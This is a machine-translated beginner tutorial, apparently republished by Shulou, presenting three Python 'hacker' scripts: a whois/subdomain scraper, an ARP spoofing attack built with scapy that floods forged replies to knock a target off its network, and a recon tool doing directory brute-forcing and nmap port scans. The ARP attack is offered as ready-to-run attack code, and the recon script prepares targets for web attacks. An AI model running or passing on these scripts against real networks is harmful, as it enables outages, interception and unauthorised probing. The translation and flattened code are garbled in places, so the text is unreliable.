Shulou(Shulou.com)05/31 Report--

This article introduces you how to get started with novice Python hacker tools, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Getting started with Python hacker tools

Preface

In order to meet the novice's pursuit of Python, three entry-level Python starter tools are featured. The first issue has written three entry-level tools, hoping that novices can have a basic understanding of Python scripts after reading them.

One set: pythond requests module to construct a whois information collector

Two-piece set: Python writes an arp outage attack

Three-piece set: catalog information collection.

A set of preface: for friends who want to write projects but don't know how to start, these scripts are easier to understand.

Briefly sort out what features this tool needs to have. The script gets the information as follows:

IP information

Subdomain name

For the record

Registrant

Mailbox

Address

Telephone

DNS

The specific operations are as follows:

The module we are going to use is requests

Python environment: py3

Installation method:

Pip install requests or python steup.py install

Query through http://site.ip138.com

Http://site.ip138.com/ enter the domain name you want to query / domain.html # this directory is used to query the IP resolution record

Htp://site.ip138.com/ enter the domain name you want to query / beian.html # which is used to query the subdomain name

Http://site.ip138.com/ enter the domain name you want to query / whois.html # this is used for whois query

All right, now let's start constructing our code, which has detailed comments.

# first of all, we need to import the BeautifulSoup and time modules in the requests module and bs4 module import requestsimport timefrom bs4 import BeautifulSoup# to set the start time point strat=time.time () def chax (): # ask the user to query the domain name lid=input ('Please enter the domain name you want to query:') # set the browser head= {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64) X64) AppleWebKit/537.36 (KHTML Like Gecko) Chrome/63.0.3239.132 Safari/537.36'} # set up url url= "http://site.ip138.com/{}/".format(lid) urldomain=" http://site.ip138.com/{}/domain.htm".format(lid) url2= "http://site.ip138.com/{}/beian.htm".format(lid) url3=" http://site.ip138.com/{}/whois.htm".format(lid ) # Open web page rb=requests.get (url Headers=head) rb1=requests.get (urldomain,headers=head) rb2=requests.get (url2,headers=head) rb3=requests.get (url3,headers=head) # get the content and return gf=BeautifulSoup (rb.content,'html.parser') print ('[+] IP parsing record') # read the p tag for x in gf.find_all ('p') in the content using text content return link=x.get_text () print (link) gf1=BeautifulSoup (rb1.content) 'html.parser') print (' [+] subdomain name query') for v in gf1.find_all ('p'): link2=v.get_text () print (link2) gf2=BeautifulSoup (rb2.content,'html.parser') print ('[+] filing query') for s in gf2.find_all ('p'): link3=s.get_text () print (link3) gf3=BeautifulSoup (rb3.content 'html.parser') print (' [+] whois query') for k in gf3.find_all ('p'): link4=k.get_text () print (link4) chax () end=time.time () print ('query time:', end-strat)

Two-piece set: write an arp outage attack using python

Do you know how arp attacks work? If you don't know, it doesn't matter. Here's the introduction.

The principle of arp attack:

ARP deception is realized by falsifying IP address and MAC address, and a large amount of ARP traffic is sent in the network. Attackers can cause man-in-the-middle attacks or network outages as long as they keep sending arp packets. (PS: we only need a few parameters in scapy to achieve this)

Scapy introduction:

Scapy is a Python program that enables users to send, sniff and parse and forge network packets. This feature allows you to build tools that can detect, scan, or attack the network.

In other words, Scapy is a powerful interactive packet handler. It can forge or decode a large number of protocol packets, send, capture, match requests and replies online, and so on. Scapy can easily handle most classic tasks such as scanning, tracking, probing, unit testing, attacks, or network discovery. It can replace hping,arpspoof,arp-sk,arping,pf, or even some parts of Nmap,tcpdump and tshark. A small example of scapy:

Ps:scapy correct food manual, please read the introduction and some of the basics: [portal]

Install scapy:

Py2 installation method:

Pip install scapy

Py3 installation method:

Pip install scapy3

More installation methods: [portal]

My system environment is: under Kali Linux

Readers can consider some of the following system environments:

Centos

Ubuntu

Mac os

Ps: try not to use windows,windows, you will get an error!

Windows.dll is missing. Will this dll be wrong again after installation? the official did not give a reply.

Write the script for the attack: Ether is to construct a network packet ARP to ARP attack sendp to send packets

Import os import sys from scapy.layers.l2 import getmacbyip from scapy.all import (Ether, ARP Sendp) # execute the command to view IP ifconfig=os.system ('ifconfig') print ifconfig gmac=raw_input (' Please enter gateway IP:') liusheng=raw_input ('Please enter your IP:') liusrc=raw_input (' Please enter target IP:') try:# to get the mac tg=getmacbyip (liusrc) print tg except Exception of the target F:print'[-] {} '.format (f) exit () def arpspoof (): try: eth=Ether () arp=ARP (op= "is-at", # arp response hwsrc=gmac, # gateway macpsrc=liusheng,# gateway IPhwdst=tg,# target Macpdst=liusrc# target IP) # outputs the configuration print ((eth/arp). Show ()) # starts sending packets sendp (eth/arp,inter=2,loop=1) except Exception G: print'[-] {} '.format (g) exit () arpspoof ()

From the victim's point of view,

Three-piece set: if you want to dig web loopholes, you must do a good job in the previous information collection.

Let's write a script to collect information.

Prepare:

Install the requests,bs4 module: pip install requests pip install bs4 or download the corresponding module package and find steup.py to execute python steup.py install

Idea: use requests.headers () to obtain http header information by htp response code to determine the existence of robots by http response code to determine the existence of directories by nmap to determine the open port (PS: here I am using os module to scan nmap commands) as soon as the nmap module on my side is called, nmap will stop running and crawl a website to obtain the corresponding whois,IP reverse search domain name information.

Start:

Import requestsimport osimport socketfrom bs4 import BeautifulSoupimport time# obtains http fingerprint def Webfingerprintcollection (): global lgr lgr=input ('Please enter the target domain name:') url= "http://{}".format(lgr) header= {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64) X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} r=requests.get (url,headers=header) xyt=r.headers for key in xyt: print (key,':', [key]) Webfingerprintcollection () print ('= =') # judge whether there is robots.txtdef robots (): urlsd= "http://{}/robots.txt".format(lgr) header = {'User-Agent':' Mozilla/5.0 (Windows NT 6.1; Win64) X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} gf=requests.get (urlsd,headers=header,timeout=8) if gf.status_code = 200: print ('robots.txt exists') print ('[+] the site exists robots.txt',urlsd) else: print ('[-] no robots.txt') robots () print ("= =") # directory scan def Webdirectoryscanner (): dict=open ('build.txt' Read () .split ('\ n') for xyt in dict: try: header = {'User-Agent':' Mozilla/5.0 (Windows NT 6.1) Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} urljc= "http://"+lgr+"{}".format(xyt) rvc=requests.get (urljc,headers=header,timeout=8) if rvc.status_code = = 200: print ('[*]' Urljc) except: print ('[-] remote host forcibly closes an existing connection') Webdirectoryscanner () print ("= =") s = socket.gethostbyname (lgr) # port scan def portscanner (): o=os.system ('nmap {} program'.format (s)) print (o) portscanner () print (' = =') # whois query def whois (): heads= {'User-Agent':' Mozilla/5.0 (Windows NT 6.1) Win64 X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} urlwhois= "http://site.ip138.com/{}/whois.htm".format(lgr) rvt=requests.get (urlwhois,headers=heads) bv=BeautifulSoup (rvt.content) "html.parser") for line in bv.find_all ('p'): link=line.get_text () print (link) whois () print ('= =') # IP reverse check domain name def IPbackupdomainname (): wu=socket.gethostbyname (lgr) rks= "http://site.ip138.com/{}/".format(wu) rod= {'User-Agent':' Mozilla/5.0 (Windows NT 6.1) Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'} sjk=requests.get (rks,headers=rod) liverou=BeautifulSoup (sjk.content,'html.parser') for low in liverou.find_all ('li'): bc=low.get_text () print (bc) IPbackupdomainname () print (' =')

On how to get started on the novice Python hacker tools to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.